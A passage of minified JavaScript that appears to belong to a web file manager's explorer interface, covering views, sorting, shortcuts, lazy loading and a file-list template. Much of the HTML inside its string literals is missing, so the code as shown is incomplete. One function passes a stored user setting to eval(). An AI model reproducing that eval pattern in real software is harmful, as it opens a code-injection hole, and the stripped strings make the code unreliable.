      ';$(e).appendTo("body"),core.isApp("desktop")||$(".task-tab").addClass("hidden"),$(window).bind("resize",function(){s("resize")}),i(),d(),p(),o()}}}),define("app/src/explorer/ui",["./fileContent"],function(e){var t=e("./fileContent"),a=t.f5,i=t.f5Callback,n=function(e){G.userConfig.listType=e,LocalData.set("listType",e),$(".set-icon-size").hide(),$(".tools-right button").removeClass("active"),$("[data-action=set-"+e+"]").addClass("active"),$("#list-type-header,.line-split-box").addClass("hidden"),$(".set-file-icon-size").hide(),$(Config.FileBoxSelector).removeClass("file-list-icon file-list-list file-list-split"),"list"==e?($(Config.FileBoxSelector).addClass("file-list-list"),$("#list-type-header").removeClass("hidden"),ui.fileListResize.bindHeaderResize()):"icon"==e?($(Config.FileBoxSelector).addClass("file-list-icon"),$(".set-icon-size").show(),$(".set-file-icon-size").show()):"split"==e&&($(Config.FileBoxSelector).addClass("file-list-split"),$(".line-split-box").removeClass("hidden")),$(".menu-set-icon").removeClass("selected"),$(".set-"+e).addClass("selected"),$(".file-continerMore").css("top",0);var t=$(".frame-right-main .tools").outerHeight();"list"==e&&(t+=26),$(".frame-header").is(":visible")&&(t+=$(".frame-header").outerHeight()),$(".bodymain").css("top",t)},o=function(e){n(e),a(!1,!1),void 0===G.sid&&$.get(G.appHost+"setting/set&k=listType&v="+e)},s=function(e,t){0!=e?(G.userConfig.listSortField=e,$(".menu-set-sort").removeClass("selected"),$(".set-sort-"+e).addClass("selected")):e=G.userConfig.listSortField,0!=t?(G.userConfig.listSortOrder=t,$(".menu-set-desc").removeClass("selected"),$(".set-sort-"+t).addClass("selected")):t=G.userConfig.listSortOrder,LocalData.set("listSortField",e),LocalData.set("listSortOrder",t),a(!1,!0),$.ajax({url:G.appHost+"setting/set&k=listSortField,listSortOrder&v="+e+","+t})},r=function(){$(".menu-recycle-button").bind("mouseenter",function(){$(this).addClass("recycle-hover")}).bind("mouseleave",function(){$(this).removeClass("recycle-hover")}).bind("click",function(){ui.path.list(G.KOD_USER_RECYCLE)}),$(".menuShareButton").bind("mouseenter",function(){$(this).addClass("share-hover")}).bind("mouseleave",function(){$(this).removeClass("share-hover")}).bind("click",function(){ui.path.list(G.KOD_USER_SHARE+":"+G.userID+"/")})},l=function(){$("#main-title div").die("click").live("click",function(){$(this).hasClass("resize")||("up"==$(this).attr("id")?$(this).attr("id","down"):$(this).attr("id","up"),s($(this).attr("field"),$(this).attr("id")))})},c=function(){$(".tools a,.tools button").bind("click",function(){var e=$(this).attr("data-action");m(e)})},d=function(){$(".dropdown-menu-theme li").click(function(){var e=$(this).attr("theme");ui.setTheme(e),$.ajax({url:G.appHost+"setting/set&k=theme&v="+e,dataType:"json",success:function(e){if(!e.code){var t=LNG.config_save_error_file;core.authCheck("setting.set")||(t=LNG.config_save_error_auth),Tips.tips(t,!1)}}})})},p=function(){$(".dialog-goto-path").bind("click",function(){var e=G.jsonData.info.adminRealPath;ui.path.list(e)}),$(".toolbar-path-more").die("click").live("click",function(){if($(this).hasClass("active"))return $(".menu-tool-path").trigger("contextmenu:hide"),$(this).removeClass("active"),void 0;$(this).addClass("active");var e=$(this).offset();$(this).contextMenu({x:e.left-4,y:e.top+$(this).outerHeight()-1})}),$(".tool-path-newfile,.tool-path-upload").die("click").live("click",function(){var e=$(this).offset();$(this).contextMenu({x:e.left-4,y:e.top+$(this).outerHeight()-1})}),$("body").bind("click",function(){$(".toolbar-path-more").removeClass("active"),$(".menu-tool-path").trigger("contextmenu:hide")})},u=function(){if("icon"!=G.userConfig.listType)return 1;var e=$(Config.FileBoxSelector).width(),t=$(Config.FileBoxClass).outerWidth()+$sizeInt($(Config.FileBoxClass).css("margin-right"));return parseInt(e/t)},f=function(){var e=u(),t=$(Config.BodyContent).outerHeight(),a=$(Config.FileBoxClass).outerHeight()+$sizeInt($(Config.FileBoxClass).css("margin-bottom"));return Math.ceil(t/a)*e},h=function(){var e=$(Config.FileBoxSelector).outerHeight()-48,t=$(Config.FileBoxClass).outerHeight()+10;return parseInt(e/t)},m=function(e){switch(e){case"recycle-clear":ui.path.recycleClear();break;case"refresh":ui.f5();break;case"newfolder":ui.path.newFolder();break;case"upload":core.upload();break;case"select-all":ui.fileSelect.selectPos("all");break;case"download":ui.path.download();break;case"set-icon":o("icon");break;case"set-list":o("list");break;case"set-split":o("split");break;default:}},v=function(){var e,t=0,a="",i=300;Mousetrap.bind(["1","2","3","4","5","6","7","8","9","0","`","~","!","@","#","$","%","^","&","*","(",")","-","_","=","+","[","{","]","}","|","/","?",".",">",",","<","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z"],function(n){var o=String.fromCharCode(n.charCode);return 0==t?(t=timeFloat(),a=o,Tips.pop(a),e=setTimeout(function(){ui.path.setSelectByChar(a),t=0},i),void 0):(i>timeFloat()-t&&(t=timeFloat(),a+=o,clearTimeout(e),Tips.pop(a),e=setTimeout(function(){ui.path.setSelectByChar(a),t=0},i)),void 0)})},g=function(){v(),Mousetrap.bind(["f1","alt+left","backspace","alt+right","ctrl+backspace","command+backspace","ctrl+shift+r","f5","left","up","right","down","home","end","shift+left","shift+up","shift+right","shift+down","shift+home","shift+end","pageup","pagedown","ctrl+a","command+a","ctrl+shift+n","ctrl+shift+f","del","shift+del","f2","ctrl+enter","command+enter","shift+enter","space","enter","ctrl+u","command+u","ctrl+c","command+c","ctrl+x","command+x","ctrl+v","command+v","ctrl+f","command+f","f3","ctrl+i","alt+i","alt+n","alt+m","alt+enter","ctrl+s","command+s","alt+f4"],function(e,t){if($("body").hasClass("stop_hot_key"))return!0;if(ui.isEdit())return!0;if($.contextMenu.isDisplay())return!0;if($(".dialog-path-remove").length>0)return!0;var a=["ctrl+c","command+c","ctrl+v","command+v","ctrl+x","command+x"];switch(inArray(a,t)||stopPP(e),t){case"f1":core.setting("help");break;case"alt+left":case"backspace":ui.path.history.back();break;case"alt+right":case"ctrl+backspace":case"command+backspace":ui.path.history.next();break;case"ctrl+shift+r":case"f5":ui.f5(!0,!0);break;case"left":case"up":case"right":case"down":case"home":case"end":case"shift+left":case"shift+up":case"shift+right":case"shift+down":case"shift+home":case"pageup":case"pagedown":case"shift+end":ui.fileSelect.selectPos(t);break;case"ctrl+a":case"command+a":ui.fileSelect.selectPos("all");break;case"ctrl+shift+n":ui.path.newFolder();break;case"ctrl+shift+f":ui.path.newFile();break;case"del":ui.path.remove();break;case"shift+del":ui.path.remove(!1,!0);break;case"f2":case"ctrl+enter":case"command+enter":ui.path.rname();break;case"shift+enter":ui.path.download();break;case"space":ui.path.open();break;case"enter":ui.path.open();break;case"ctrl+u":case"command+u":core.upload();break;case"ctrl+e":case"ctrl+c":case"command+c":ui.path.copy();break;case"ctrl+x":case"command+x":ui.path.cute();break;case"ctrl+v":case"command+v":ui.path.past();break;case"f3":case"ctrl+f":case"command+f":ui.path.search($(".header-right input").val(),G.thisPath);break;case"alt+enter":case"ctrl+i":case"alt+i":ui.path.info();break;case"alt+n":ui.path.newFile();break;case"alt+m":ui.path.newFolder();break;case"ctrl+s":case"command+s":ShareData.frameTop("OpenopenEditor",function(e){e.Editor.save()});break;default:}})},b=function(){if(core.isApp("desktop")){var e=20,t=20,a=parseInt($(".file").css("height")),i=a-30,n=10,o=15,s=$(document).height()-80,r=Math.floor((s-e)/(a+n)),l=0,c=0,d=0,p=0,u=(s-e-r*(a+n)-n)/r;u>0&&(n+=u),$(".file-continer .file").css("position","absolute"),$(".file-continer .file").each(function(s){l=s%r,c=Math.floor(s/r),d=t+(i+o)*c,p=e+(a+n)*l,$(this).css({left:d,top:p})})}};return{f5:a,f5Callback:i,fileContent:t,initListType:n,setListSort:s,setListType:o,getRowfileNumber:u,getPagefileNumber:f,getColfileNumberDesktop:h,resetDesktopIcon:b,setTheme:function(e){G.userConfig.theme=e,core.setSkin(e),ShareData.frameTop("OpenopenEditor",function(t){t.Editor.setTheme(e)}),ShareData.frameTop("Opensetting_mode",function(t){t.Setting.setThemeSelf(e)}),ShareData.frameTop("",function(t){t.ui.setTheme(e)}),$(".dropdown-menu-theme .list").removeClass("this"),$('.dropdown-menu-theme .list[theme="'+e+'"]').addClass("this")},setWall:function(e,t){$(".background").attr("src",e).one("load",function(){$(".full-background").css("background-image","url("+e+")"),"function"==typeof t&&t()})},setFileIconSize:function(e){ui.fileListResize.setFileIconSize(e,!0),core.isApp("desktop")&&ui.f5()},isEdit:function(){var e=$(document.activeElement).get(0);if(e)return e=e.tagName,"INPUT"==e||"TEXTAREA"==e?!0:$(".file.file-icon-edit").length>0?!0:!1},init:function(){if(G.sid){LocalData.get("theme")&&(G.userConfig.theme=LocalData.get("theme")),LocalData.get("listType")&&(G.userConfig.listType=LocalData.get("listType")),LocalData.get("listSortField")&&(G.userConfig.listSortField=LocalData.get("listSortField")),LocalData.get("listSortOrder")&&(G.userConfig.listSortOrder=LocalData.get("listSortOrder")),LocalData.set("theme",G.userConfig.theme),LocalData.set("listType",G.userConfig.listType),LocalData.set("listSortField",G.userConfig.listSortField),LocalData.set("listSortOrder",G.userConfig.listSortOrder);var e=window.location.href.split("#");2==e.length&&(G.thisPath=urlDecode(e[1]))}if(ui.setTheme(G.userConfig.theme),""==G.thisPath){var a=G.userID||G.sid,o=LocalData.get("thisPath:"+a);G.thisPath=o?o:G.myhome}n(G.userConfig.listType),t.init(),b(),ui.path.history.add(G.thisPath),i(function(){b()}),r(),l(),d(),c(),g(),p()}}}),define("app/src/explorer/fileContent",[],function(require,exports){var tpl=require("../../path/tpl/file/list.html"),pageLoadMax=200,ajaxLive=function(){ui.fileLight.init(),core.isApp("desktop")&&ui.resetDesktopIcon(),"split"==G.userConfig.listType&&ui.fileListResize.bindSplitResize(),lazyLoadImage(),iconFlex(),Hook.trigger("explorer.path.ajaxLive")},lazyLoadImage=function(){var e=$(".bodymain");"split"==G.userConfig.listType&&(e=$(".split-box").last().find(".content")),e.find(".lazyload-ready").lazyload({failure_limit:10,threshold:200,placeholder:G.staticPath+"images/common/loading_circle.gif",skip_invisible:!1,effect:"fadeIn",container:e,load:function(){$(this).removeClass("lazyload-ready")}}).on("error",function(){var e=$(this).data("errorReload");e?"1"==e&&($(this).parent().attr("filetype"),$(this).attr("src",G.staticPath+"images/file_icon/icon_file/picture_error.png"),$(this).data("errorReload","2")):($(this).attr("src",$(this).attr("src")+"#"+UUID()),$(this).data("errorReload","1"))})},iconFlex=function(){if(!core.isApp("desktop")&&"icon"==G.userConfig.listType){$(".file-list-icon .flex-empty").remove();for(var e="",t=0;30>t;t++)e+='
      ';$(e).appendTo(".file-list-icon")}},mainDataDefaultApps=function(){template.helper("fileIconMake",fileIconMake);var e=template.compile(tpl),t="";for(var a in desktopApps){var i={LNG:LNG,G:G,list:desktopApps[a],type:"icon-file"};t+=e(i)}return t},mainSetData=function(e){var t=makeHtml(G.jsonData,0,getPageNumber()-1);core.isApp("desktop")&&(t=mainDataDefaultApps()+t),t=htmlListAction(G.jsonData,t,!1),"split"==G.userConfig.listType&&(t='
      '+t+'
      '),e?$(Config.FileBoxSelector).hide().html(t).fadeIn(Config.AnimateTime).css("display",""):$(Config.FileBoxSelector).html(t),"split"==G.userConfig.listType&&$(".split-box").data("jsonData",G.jsonData),ajaxLive()},scrollDelayTimer="",bindScrollLoadMore=function(){var e=$(".bodymain");e.scroll(function(){clearTimeout(scrollDelayTimer),scrollDelayTimer=!1,scrollDelayTimer=setTimeout(function(){0!=e.scrollTop()&&loadMore()},100)}),$(".split-load-more").live("dblclick",function(){$("[data-action=set-list]").click()})},getPageNumber=function(){var e=ui.fileLight.fileListAll().last(),t=$(".bodymain .file-continer-more");if(0==e.length)return pageLoadMax;var a=G.jsonData.folderList.length+G.jsonData.fileList.length;if(t.css("top",0),pageLoadMax>a||"split"==G.userConfig.listType)return pageLoadMax;var e=ui.fileLight.fileListAll().last(),i=e.outerWidth()+$sizeInt(e.css("margin-right"))+3.5,n=parseInt($(".file-continer").width()/i);"icon"!=G.userConfig.listType&&(n=1);var o=e.outerHeight()+$sizeInt(e.css("margin-bottom")),s=Math.ceil($(Config.BodyContent).height()/o),r=Math.ceil(a/n)*o;return t.css("top",r),s*n},resetTotalHeight=function(){var e=".bodymain .file-continer > .file",t=$(e).last(),a=$(".bodymain .file-continer-more");if(0!=t.length){var i=G.jsonData.folderList.length+G.jsonData.fileList.length;if(a.css("top",0),!(pageLoadMax>i||"split"==G.userConfig.listType)){var n=t.outerWidth()+$sizeInt(t.css("margin-right")),o=parseInt($(".file-continer").width()/n);"icon"!=G.userConfig.listType&&(o=1);var s=t.outerHeight()+$sizeInt(t.css("margin-bottom"));Math.ceil($(Config.BodyContent).height()/s);var r=Math.ceil(i/o)*s;a.css("top",r)}}},loadMoreDelayTimer,loadMore=function(){var e=$(".bodymain .file-continer > .file"),t=e.last(),a=e.length-1,i=G.jsonData.folderList.length+G.jsonData.fileList.length;if(!(a>=i-1||"split"==G.userConfig.listType)){var n=$(".bodymain").scrollTop(),o=$(".bodymain").height(),s=$(".bodymain").offset().top;$(".file-continer").offset().top;var r=t.outerHeight()+$sizeInt(t.css("margin-bottom")),l=s+o-r;if(l>t.offset().top){var c=l-t.offset().top,d=getPageNumber(),p=Math.ceil(c/o),u=p*d+a;u>i&&(u=i),u-a>1e3?($(".init-loading").show(),clearTimeout(loadMoreDelayTimer),loadMoreDelayTimer=setTimeout(function(){loadMoreSet(a+1,u),$(".bodymain").scrollTop(n)},300)):loadMoreSet(a+1,u)}}},loadMoreSet=function(e,t){var a=makeHtml(G.jsonData,e,t),i=$(a);i.appendTo(".file-continer"),ui.fileLight.fileListAll($(Config.FileBoxClass)),ui.fileLight.menuAction("clear"),lazyLoadImage(),iconFlex(),$(".init-loading").hide()},fileIconMake=function(e,t,a){var i="icon"!=t;if("folder"==e){var n=Hook.trigger("explorer.list.folderThumb",a.path,a.ext);return"string"==$.type(n)?n:(e=a.ext||e,core.icon(e,i))}var n=Hook.trigger("explorer.list.fileThumb",a.path,a.ext);if("string"==$.type(n))return n;if(inArray(["jpg","jpeg","png","bmp","gif","ico","svg","cur","webp"],a.ext)){var o=G.appHost+"explorer/image&path=";return G.sid&&(o=G.appHost+"share/image&user="+G.user+"&sid="+G.sid+"&path="),"
      "}if("app_link"==a.type){var s=core.icon("folder");0==a.content.search("ui.path.open")?s=core.icon(core.pathExt(a.name.replace(".oexe",""))):0==a.content.search("ui.path.list")&&(s=core.icon(a.icon));var r="
      "+s+"
      ";return r+""}if(a.icon&&"oexe"==a.ext){var l=a.icon;return"string"==$.type(a.icon)&&-1==a.icon.search(G.staticPath)&&"http"!=a.icon.substring(0,4)&&(l=G.staticPath+"images/file_icon/icon_app/"+a.icon),"
      "+core.iconSrc(l)+"
      "}return"
      "+core.icon(a.ext,i)+"
      "},makeHtml=function(e,t,a){template.helper("fileIconMake",fileIconMake);var i=template.compile(tpl),n="",o=[];o="up"==G.userConfig.listSortOrder?e.folderList.concat(e.fileList):e.fileList.concat(e.folderList),(!a||a>=o.length-1)&&(a=o.length-1);for(var s=t;a>=s;s++){var r="folder"==o[s].type?"-folder":"-file",l={LNG:LNG,G:G,list:o[s],index:s,type:G.userConfig.listType+r};n+=i(l)}return n},pathChildrenTree=function(e,t){if("string"==$.type(e))var a=$('.file[data-path="'+pathHashEncode(e)+'"]');else{var a=e;e=ui.fileLight.path(a)}if(1==a.length){var i=a.find(".children-more"),n=a.find(".children-more-cert"),o=$('.children-list[data-path-children="'+pathHashEncode(e)+'"]'),s=23;if(n.toggleClass("cert-open"),o.toggleClass("hidden"),o.hasClass("child-already-init"))return pathListOdd(),void 0;a.addClass("loading-children"),pathGet(e,function(e){a.removeClass("loading-children");var n=makeHtml(e,0,getPageNumber()-1);""!=n&&(n=htmlListAction(e,n,!0)),o.html(n),ajaxLive(),o.addClass("child-already-init");var r=s+parseInt(i.css("padding-left"));o.find(".file .children-more").css("padding-left",r),pathListOdd(),"function"==typeof t&&t(e)})}},htmlListAction=function(e,t,a){if(""==t)return t='
      '+LNG.path_null+"
      ";var i=e.folderList.concat(e.fileList);if(i.length>pageLoadMax){var n=core.pathFather(i[0].path);"list"==G.userConfig.listType&&a?t+='
      '+'
      '+''+'
      '+''+LNG.file_load_all+""+"
      "+"
      ":"split"==G.userConfig.listType&&(t+='
      '+'
      '+'
      '+''+LNG.file_load_all+"(to list)"+"
      "+"
      ")}return t},pathListOdd=function(){var e=0;ui.fileLight.fileListAll().each(function(){0==$(this).parents(".hidden").length&&(0==e%2?$(this).addClass("file2"):$(this).removeClass("file2"),e++)})},pathChildrenSplit=function(e,t){var a=$('.file[data-path="'+pathHashEncode(e)+'"]'),i=$(".file-list-split .split-box[data-path='"+pathHashEncode(e)+"']");if(0==a.length)return"function"==typeof t&&t(),void 0;if(1==i.length)return i.nextAll().remove(),"function"==typeof t&&t(),void 0;var n=a.parent().parent();pathSplitCreate(e,t,n)},pathSplitCreate=function(e,t,a){pathGet(e,function(i){if("notExists"==i.pathReadWrite)return t(i);var n=makeHtml(i,0,getPageNumber()-1);if(n=htmlListAction(i,n,!0),a)if(a.nextAll(".split-box").length>0){var o=a.next(".split-box");o.attr("data-path",pathHashEncode(e)).find(".content").html(n),o.nextAll().remove()}else n='
      '+n+'
      ',$(n).insertAfter(a).data("jsonData",i);else n='
      '+n+'
      ',$(n).appendTo(".file-list-split").data("jsonData",i);ajaxLive(),"function"==typeof t&&t()})},beforeSelectFileArr={},beforeListOpenArr={},beforeListOpen={},beforeListSplitSelect="",beforeScrollerLeft=0,f5Before=function(){if(!("icon"==G.userConfig.listType||beforeListOpenArr.length>0))if(beforeListOpenArr={},beforeListOpen={},"list"==G.userConfig.listType){var e=$(".child-already-init:visible");if(1>e.length)return;e.each(function(){var e=$(this),t=beforeListOpenArr,a=ui.fileLight.path(e,"data-path-children");beforeListOpen[a]=!1;for(var i=[a];0!=e.parents(".children-list").length;)e=e.parents(".children-list"),i.push(ui.fileLight.path(e,"data-path-children"));for(var n=i.length-1;n>=0;n--){var o=i[n];t[o]!==void 0?t=t[o]:t[o]={}}})}else if("split"==G.userConfig.listType){var t=beforeListOpenArr;beforeScrollerLeft=$(".drag-upload-box").scrollLeft(),beforeListSplitSelect=ui.fileLight.path($(".file-list-split .split-box.split-select")),$(".file-continer .split-box").each(function(){var e=ui.fileLight.path($(this));""!=e&&(t[e]={},t=t[e],beforeListOpen[e]=!1)})}},f5After=function(e){return"icon"==G.userConfig.listType||0==Object.keys(beforeListOpenArr).length?(f5AfterReloadFinished(e),void 0):("split"==G.userConfig.listType&&$(".file-list-split .split-box").remove(),f5AfterReload(beforeListOpenArr,e),void 0)},f5AfterReload=function(e,t){$.each(e,function(e,a){var i=pathChildrenTree;"split"==G.userConfig.listType&&(i=pathSplitCreate),i(e,function(){beforeListOpen[e]=!0,0!=Object.keys(a).length?f5AfterReload(a,t):f5AfterReloadFinished(t)})}),f5AfterReloadFinished(t)},f5AfterReloadFinished=function(e){for(var t in beforeListOpen)if(beforeListOpen[t]===!1)return;$(".drag-upload-box").scrollLeft(beforeScrollerLeft),ui.path.setSelectByFilename(beforeSelectFileArr),ui.fileSelect.selectSplit(beforeListSplitSelect),beforeListOpenArr={},beforeListOpen={},beforeSelectFileArr={},beforeListSplitSelect="","function"==typeof e&&e()},f5=function(e,t,a){if(void 0==e&&(e=!0),void 0==t&&(t=!1),jsonDataSortTitle(),f5Before(),beforeSelectFileArr=ui.fileLight.getAllName(),e?pathGet(G.thisPath,function(e){G.jsonData=e,mainSetData(t),pathTypeChange(G.jsonData),loadMore(),resetTotalHeight(),f5After(a),core.isApp("desktop")?checkRecycle():ui.headerAddress.addressSet()},function(){$(Config.FileBoxSelector).html("")}):(G.jsonData=jsonDataSort(G.jsonData),mainSetData(t),pathTypeChange(G.jsonData),loadMore(),resetTotalHeight(),f5After(a)),!core.isApp("desktop")){var i=G.userID||G.sid;LocalData.set("thisPath:"+i,G.thisPath)}},sortBy=function(e,t){var t="down"==t?-1:1;return function(a,i){var a=a[e],i=i[e];return pathTools.strSort(a,i)*t}},jsonDataSort=function(e){e=jsonDatafilter(e);var t=e.folderList,a=e.fileList;return t="size"==G.userConfig.listSortField||"ext"==G.userConfig.listSortField?t.sort(sortBy("name",G.userConfig.listSortOrder)):t.sort(sortBy(G.userConfig.listSortField,G.userConfig.listSortOrder)),a=a.sort(sortBy(G.userConfig.listSortField,G.userConfig.listSortOrder)),e.folderList=t,e.fileList=a,e},pathGet=function(e,t,a){var i=G.appHost+"explorer/pathList&path="+urlEncode(e);G.user&&(i=G.appHost+"share/pathList&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(e)),$.ajax({url:i,dataType:"json",beforeSend:function(){$(".tools-left .msg").stop(!0,!0).fadeIn(200)},success:function(e){if($(".tools-left .msg").fadeOut(300),!e||!e.code)return Tips.tips(e),"function"==typeof a&&a(),!1;var i=jsonDataSort(e.data);"function"==typeof t&&t(i)},error:function(e,t,i){$(".tools-left .msg").fadeOut(300),core.ajaxError(e,t,i),"function"==typeof a&&a()}})},f5Callback=function(e){f5(!0,!1,e)},jsonDatafilter=function(e){if(!e)return e;if(void 0!=e.shareList&&(selfShare=e.shareList),e.filterSuccess===!0)return e;for(var t in e)if("fileList"==t||"folderList"==t)for(var a=0;e[t].length>a;a++){var i=e[t][a];if(i.mtime&&11>=(""+i.mtime).length)if(i.atime=date(LNG.time_type,i.atime),i.ctime=date(LNG.time_type,i.ctime),e.info&&e.info.pathType==G.KOD_USER_SHARE&&-1==trim(e.thisPath,"/").indexOf("/")){var n=parseInt(i.numView);n=isNaN(n)?0:n;var o=parseInt(i.numDownload);o=isNaN(o)?0:o;var s=date("Y/m/d ",i.mtime)+" ";s+=LNG.share_view_num+n+" "+LNG.share_download_num+o,i.mtime=s}else i.mtime=date(LNG.time_type,i.mtime);i.name=htmlEncode(i.name),i.sid&&"file"==i.type&&(i.ext=htmlEncode(core.pathExt(i.path))),pathIsShare(i.path)?i.metaInfo="path-self-share":pathIsFav(i.path)&&(i.metaInfo="tree-fav"),"number"==typeof i.isReadable&&0==i.isReadable?i.mode="["+LNG.not_read+"] "+i.mode:"number"==typeof i.isWriteable&&1==i.isWriteable?i.mode="["+LNG.system_role_write+"] "+i.mode:"number"==typeof i.isReadable&&1==i.isReadable&&(i.mode="["+LNG.only_read+"] "+i.mode),e.info&&e.info.pathType==G.KOD_USER_RECYCLE&&trim(e.thisPath,"/")==G.KOD_USER_RECYCLE&&(i.menuType="menu-recycle-path")}return e.filterSuccess=!0,e},jsonDataSortTitle=function(){var up='',down='';$("#main-title .this").toggleClass("this").attr("id","").find("span").html(""),$("#main-title div[field="+G.userConfig.listSortField+"]").addClass("this").attr("id",G.userConfig.listSortOrder).find("span").html(eval(G.userConfig.listSortOrder))},pathIsShare=function(e){for(var t in G.selfShare)if(core.pathClear(G.selfShare[t].path)==core.pathClear(e))return!0;return!1},pathIsFav=function(e){var t=G.fav_list;for(var a in t)if(core.pathClear(a)==core.pathClear(e))return!0;return!1},checkRecycle=function(){$.ajax({url:G.appHost+"explorer/pathList&type=desktop&path="+G.KOD_USER_RECYCLE,dataType:"json",error:core.ajaxError,success:function(e){if(!e.code)return!1;var t=core.icon("recycle-full");0==e.data.folderList.length&&0==e.data.fileList.length&&(t=core.icon("recycle")),$(".menu-recycle-button .ico").html(t)}})},pathTypeChange=function(e){if(e.info){var t=e.info,a=t.pathType,i=e.pathReadWrite,n="menu-body-main menu-recycle-body menu-share-body",o=$(".drag-upload-box");t.canUpload=!0,(void 0!=i&&"writeable"!=i||a==G.KOD_GROUP_SHARE&&"owner"!=t.role&&1!=G.isRoot||a==G.KOD_USER_SHARE&&"owner"!=t.role&&1!=G.isRoot||a==G.KOD_GROUP_PATH&&"guest"==t.role&&1!=G.isRoot||a==G.KOD_USER_FAV||a==G.KOD_USER_RECYCLE||a==G.KOD_GROUP_ROOT_ALL||a==G.KOD_GROUP_ROOT_SELF)&&(t.canUpload=!1);var s=[G.KOD_USER_SHARE,G.KOD_USER_FAV,G.KOD_GROUP_ROOT_SELF,G.KOD_GROUP_ROOT_ALL],r=".kod-toolbar-recycle,.kod-toolbar-share";$(r).addClass("hidden"),a==G.KOD_USER_RECYCLE?(o.removeClass(n).addClass("menu-recycle-body"),$(".tools-left .kod-toolbar").addClass("hidden"),$(".kod-toolbar-recycle").removeClass("hidden")):-1!==s.indexOf(a)?-1===core.pathClear(rtrim(G.thisPath,"/")).indexOf("/")?(o.removeClass(n).addClass("menu-share-body"),$(".tools-left .kod-toolbar").addClass("hidden"),$(".kod-toolbar-share").removeClass("hidden"),t.id==G.userID?($(".menu-share-path-menu").find(".open-the-path,.share-edit,.remove").removeClass("hidden"),$(".menu-share-path-more").find(".remove").removeClass("hidden")):($(".menu-share-path-menu").find(".open-the-path,.share-edit,.remove").addClass("hidden"),$(".menu-share-path-more").find(".remove").addClass("hidden"))):(o.removeClass(n).addClass("menu-body-main"),$(".tools-left .kod-toolbar").addClass("hidden"),$(".kod-toolbar-path").removeClass("hidden")):(o.removeClass(n).addClass("menu-body-main"),$(".tools-lef .kod-toolbar").addClass("hidden"),$(".kod-toolbar-path").removeClass("hidden")),currentPathMenu(e)}},currentPathMenu=function(e){var t=e.info,a=e.pathReadWrite,i=t.pathType,n=".create-link,.create-project,.cute,.remove,.rname,.zip,.unzip-this,.unzip-folder,.newfile,.newfolder,.new-file-other,.app-create,.app-install,.past,.upload,.clone",o="disable",s=$(".kod-toolbar-path .btn").not(".toolbar-path-more"),r=$("ul.menu-folder,ul.menu-more,ul.menu-file,ul.file-continerMenu");t.canUpload?(r.find(n).removeClass(o),$(".path-tips").hide(),s.removeClass("disabled")):(s.addClass("disabled"),r.find(n).addClass(o),$(".path-tips span").html(LNG.only_read),i==G.KOD_USER_RECYCLE||i==G.KOD_USER_SHARE?($(".path-tips").hide(),s.removeClass("disabled"),i==G.KOD_USER_SHARE&&G.userID!=t.id&&s.addClass("disabled")):$(".path-tips").show());var l=$(".group-space-use");if((i==G.KOD_GROUP_PATH||i==G.KOD_GROUP_SHARE)&&G.isRoot||i==G.KOD_GROUP_PATH&&"owner"==t.role){var c=e.groupSpaceUse;if(c){var d=core.userSpaceHtml(c.sizeUse+"/"+c.sizeMax);l.removeClass("hidden").html(d)}else l.addClass("hidden")}else l.addClass("hidden");if(e.userSpace){var c=e.userSpace,d=core.userSpaceHtml(c.sizeUse+"/"+c.sizeMax);$(".user-space-info").html(d)}if("notExists"==a&&($(".path-tips span").html(LNG.not_exists),$(".path-tips").show()),$(".role-label-box").html(""),i==G.KOD_GROUP_SHARE){var p=""+LNG.group_guest+"";$(".role-label-box").html(p),G.isRoot&&$(".role-label-box").html("")}else if(i==G.KOD_GROUP_PATH&&t.groupRole){var p=""+t.groupRole.name+"";$(".role-label-box").html(p)}(i==G.KOD_GROUP_ROOT_ALL||i==G.KOD_GROUP_ROOT_SELF||i==G.KOD_USER_FAV||i==G.KOD_GROUP_SHARE)&&$(".path-tips").hide(),1==G.isRoot&&t.adminRealPath?$(".admin-real-path").removeClass("hidden"):$(".admin-real-path").addClass("hidden")};return{f5:f5,f5Callback:f5Callback,pathTypeChange:pathTypeChange,pathChildrenTree:pathChildrenTree,pathChildrenSplit:pathChildrenSplit,init:function(){$(window).bind("resize",function(){resetTotalHeight(),core.isApp("desktop")?ui.resetDesktopIcon():ui.headerAddress.resetWidth()}),bindScrollLoadMore()}}}),define("app/path/tpl/file/list.html",[],"\n{{if type=='icon-folder'}}\n
      \n {{if !list.menuType}}
      {{/if}}\n
      \n
      \n {{fileIconMake('folder','icon',list)}}\n
      \n {{if list.metaInfo}}\n
      {{list.metaInfo |kod.core.icon}}
      \n {{/if}}\n
      \n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{list.name}}\n {{/if}}\n \n
      \n
      \n\n\n{{else if type=='list-folder'}}\n
      \n {{if !list.menuType}}
      {{/if}}\n
      \n
      \n {{if list.metaInfo}}\n
      {{list.metaInfo |kod.core.icon}}
      \n {{/if}}\n \n {{if list.isParent&&list.isReadable}}{{/if}}\n \n
      \n {{fileIconMake('folder','list',list)}}\n
      \n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{list.name}}\n {{/if}}\n \n
      \n
      {{LNG.folder}}
      \n
      \n
      {{list.mtime || \"\"}}
      \n
      \n
      \n{{if list.isParent&&list.isReadable}}\n
      \n{{/if}}\n\n\n{{else if type=='split-folder'}}\n
      \n {{if !list.menuType}}
      {{/if}}\n
      \n
      \n {{if list.metaInfo}}\n
      {{list.metaInfo |kod.core.icon}}
      \n {{/if}}\n
      \n {{fileIconMake('folder','split',list)}}\n
      \n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{list.name}}\n {{/if}}\n \n \n {{if list.isReadable && typeof(list.menuType)==\"undefined\"}}\n \n {{/if}}\n \n
      \n
      \n\n\n{{else if type=='icon-file'}}\n
      \n {{if !list.menuType}}
      {{/if}}\n
      \n {{fileIconMake('file','icon',list)}}\n {{if list.metaInfo}}\n
      {{list.metaInfo |kod.core.icon}}
      \n {{/if}}\n
      \n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{if list.ext=='oexe'}}{{list.name.replace('.oexe','')}}{{else}}{{list.name}}{{/if}}\n {{/if}}\n \n
      \n
      \n\n\n{{else if type=='list-file'}}\n
      \n {{if !list.menuType}}
      {{/if}}\n
      \n
      \n \n {{fileIconMake('file','list',list)}}\n {{if list.metaInfo}}\n
      {{list.metaInfo |kod.core.icon}}
